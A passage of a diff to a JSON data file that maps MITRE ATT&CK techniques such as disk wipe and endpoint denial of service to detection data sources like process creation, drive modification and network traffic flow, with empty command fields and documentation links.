"data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firewall rule" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service modification", + "description": "A cloud service was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service disable", + "description": "A cloud service was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + null, + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1561.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1561.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1561", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1560.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1499.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + 